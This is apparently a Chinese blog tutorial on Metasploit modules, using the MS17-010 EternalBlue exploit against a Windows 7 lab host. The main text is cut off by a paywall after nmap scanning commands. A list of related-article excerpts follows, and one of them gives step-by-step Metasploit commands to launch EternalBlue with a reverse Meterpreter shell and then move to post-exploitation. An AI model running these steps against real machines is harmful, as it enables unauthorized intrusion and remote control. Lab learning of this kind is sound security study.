利用 MS17-010 对 MSF 模块学习

原创

已于 2022-09-01 19:32:08 修改 · 722 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#学习 #安全

于 2022-08-30 19:21:58 首次发布

我之前写了一篇利用 MSF 里的永恒之蓝模块进行攻击初代 Windows10 还有木马制造.

现在看来只是写了简单的 exploit 使用,并没有开拓 msf 其他模块强大的地方.

Auxiliary 是什么?

Payload 、Post 又是什么?

这几者之间又有什么关联?

我当时在自学 msf 的时候,往往注重结果,而没注重过程.

我也许该重新了解一下这个 MSF 了,就用之前写的 MS17-010 重新盘一遍进行理解

准备工作:

攻击机: Kali Linux (IP:192.168.31.201,宿主机IP:192.168.31.30)

肉鸡: Windows 7 pro (IP:192.168.31.204,宿主机IP:192.168.31.30)

1. 肉机扫描

在这里就要用到 Auxiliary 模块

这个模块是辅助模块,可以用来扫描,破解,嗅探,漏洞挖掘等,在这里我将使用 Auxiliary 模块进行 ms17-010 扫描.

在开始之前,我们先用 nmap 扫描一下局域网内能连通那些机器(假装不知道IP)

nmap -sS -T4 192.168.31.0/24

叨叨念

其实可以试着用 nmap 里面的 vuln 脚本试一下

nmap --script=vuln 192.168.31.204

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

真不想起名TAT

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ms17-010漏洞利用MSF

weixin_42373409的博客

09-10

748

ms17-010漏洞利用 ## **实验环境** 1.kali linux（ip:192.168.131.131） 2.windows 7家庭版（ip:192.168.131.133、445端口开放） ## **利用过程** 1.利用nmap扫描目标主机的端口开放情况；

msf下MS17-010模块使用总结

最新发布

m0_74849202的博客

04-30

663

msfvenom的功能：常用于生成木马，在目标机器上执行，在本地机器kali中上线，与反弹Shell类似。MSFV enom可以生成两种类型的攻击载荷：（1）Payload：Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意程序，而在Metasploit中Payload是一种特殊模块，它们能够以漏洞利用模块运行，并能够利用目标系统中的安全漏洞实施攻击。简而言之，这种漏洞利用模块可以访问目标系统，而其中的代码定义了Payload在目标系统中的行为。

MSF利用漏洞永恒之蓝MS17-010

weixin_46104215的博客

09-27

1317

MS17-010：利用微软SMB远程代码执行漏洞，基于端口445 SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。一、实验环境攻击主机：2021 Kali ip：192.168.110.130（ifcon...

Metasploit(MSF)使用教程（以ms17_010永恒之蓝为例）

天乐的博客

03-12

2887

Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012和Windows Server 2016等，利用SMB协议（特别是SMBv1）的漏洞，需要目标系统开放了139或445端口。到此本文就结束了，本文仅介绍Metasploit的简单入门，更多功能自行学习探索，相信你会掌握这一款强大的渗透测试扫描神器，禁止非法扫描，后果自负。1.启动kali的nmap，探测一下靶标的455端口开放情况。

Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝（ms17_010）为例

weoptions的博客

09-21

5895

Metasploit是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点，讲解MSF框架的使用。

通过Metasploit实现MS17-010（永恒之蓝漏洞）的复现学习

Time_worm的博客

07-14

1377

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。

kail环境下msf框架攻击ms17-010（永恒之蓝）漏洞演示

weixin_46447549的博客

04-23

7614

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录前言前言实验目的实验环境实验步骤1.引入库2.读入数据总结前言提示：这里可以添加本文要记录的大概内容：例如：随着人工智能的不断发展，机器学习这门技术也越来越重要，很多人都开启了学习机器学习，本文就介绍了机器学习的基础内容。提示：以下是本篇文章正文内容，下面案例可供参考前言 MS17-010（永恒之蓝）是一种操作系统漏洞，他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA（National Secu.

ms17-010漏洞复现（正向连接+反向连接）

qq_53733257的博客

07-15

1382

攻击机和目标机一定要能互相通信，否则就要调试设置网络适配器以及查看目标机防火墙是否关闭，直到能够互相通信为止。，完成后不要关闭终端，让他一直挂在后台。set rhosts 192.168.21.19 #设置模块3的参数，将rhosts设置成目标机ip。set rhosts 192.168.21.19 #设置模块0的参数，将rhosts设置成目标机ip。4、使用编号为3的模块，对目标机进行扫描，确认该目标机是否存在ms17-010漏洞。5、利用模块0，对目标机进行攻击，模块0的利用方式步骤和模块3相同。

永恒之蓝MS17-010漏洞利用

qq_1873822的博客

08-20

3277

前言永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服

msf常用模块功能整理

m0_55306747的博客

07-21

6078

整理一下msf的常用模块和功能

MSF框架-技术功能模块

分享学习网络的点点滴滴

12-20

462

■ 三种Payload：/usr/share/metasploit-framework/modules/payloads/○ Auxiliary：执行信息收集、枚举、指纹探测、扫描等功能的辅助模块（没有payload的exploit模块）○ Exploits：利用系统漏洞进行攻击的动作，此模块对应每一个具体漏洞的攻击方法（主动、被动）■ Shellcode是payload的一种，由于其建立正向/反向shell而得名。■ Stages：利用stager建立的连接下载的后续payload。

msf介绍及其常用模块

bwt_D的博客

03-01

6780

技术功能模块 exploits：利用系统漏洞进行攻击的动作，此模块对应每一个具体漏洞的攻击方法 payload：成功exploit之后，真正在目标系统执行的代码或指令 auxiliary：执行信息收集、枚举、指纹探测、扫描等功能的辅助模块 encoders：对payload进行加密，躲避av检查的模块 nops：提高payload稳定性及维持大小 generate常用选项解释： -b 去掉坏字符，例如：-b ‘\x00\xff’ -e 设置编码方式，可以使用show encoders命令查看所有编码方式 -

MS17-010（Eternal blue永恒之蓝）漏洞利用+修复方法

记录学习

06-21

6438

msf永恒之蓝漏洞复现过程以及修复建议

MS17-010漏洞利用

weixin_51716781的博客

06-08

402

MSF17-010永恒之蓝漏洞利用练习环境： win7x64：IP：192.168.146.128 kali： IP：192.168.146.130 整体步骤为： 1：进入msf 2：查看是否存在ms17-010 3：选择利用模块 4：设置IP 和端口 5：可以查看是否设置成功 6：run查看执行结果 7：shell 进入系统第一步：进入msf：命令：msfconsole 第二步：查看有没有ms17-010的模块命令：search ms17-010 第三步：存在ms17-010的模块选择

Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用

dzqxwzoe的博客

02-29

1915

l, --list 列出指定模块的所有可用资源，包括：payloads，encodes，nops，all-p, --payload 指定所需要使用的payload，也可以使用自定义payload，几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode，指定需要使用的编码。

Metasploit Framework（MSF）基础框架

weixin_51151498的博客

02-12

3684

MSF使用

msf辅助模块详细操作

m0_61506558的博客

09-03

1585

我们知道msf辅助模块有上千个，主要用于信息搜集阶段，功能包括扫描、口令猜解、敏感信息嗅探、FUZZ测试发掘漏洞、实施网络协议欺骗等一、怎么查询 Auxiliary辅助模块我们可以通过以下命令查询所有 Auxiliary辅助模块或二、 Auxiliary辅助模块分类。

msf打ms17-010

02-25

### 使用 Metasploit 执行 MS17-010 漏洞利用 #### 加载 EternalBlue Exploit 模块为了针对 MS17-010 漏洞进行攻击或测试，在 Metasploit 中加载特定的 SMB 漏洞利用模块： ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue ``` 这一步骤选择了用于 Windows SMB 服务中的 MS17-010 漏洞——即著名的“永恒之蓝”漏洞的攻击向量[^1]。 #### 设置目标和配置 Payload 一旦选定模块之后，设置目标机器的相关参数以及选择有效负载(Payload)，默认情况下会选择 `windows/x64/meterpreter/reverse_tcp` 这种反向 TCP Meterpreter shell 类型的有效荷载: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target_ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <local_ip> ``` 这里 `<target_ip>` 是指代存在潜在漏洞的目标主机 IP 地址，而 `<local_ip>` 则是指本地监听地址以便接收来自受害者的连接请求[^3]。 #### 验证并运行 Exploit 完成上述准备工作后，可以通过命令来检查当前设定是否合理，并最终执行实际攻击操作： ```bash msf6 exploit(windows/smb/ms17_010_etternalblue) > check msf6 exploit(windows/smb/ms17_010_eternalblue) > run ``` 需要注意的是，“check” 功能并非总是能够准确判断远程系统的脆弱性状态；因此即使返回不确定的结果也值得一试 “run”。 #### 后渗透阶段如果成功突破，则会获得一个交互式的 Meterpreter Shell 或者其他形式的访问权限。此时可以根据具体需求进一步开展后续行动，比如文件系统浏览、密码提取等高级功能。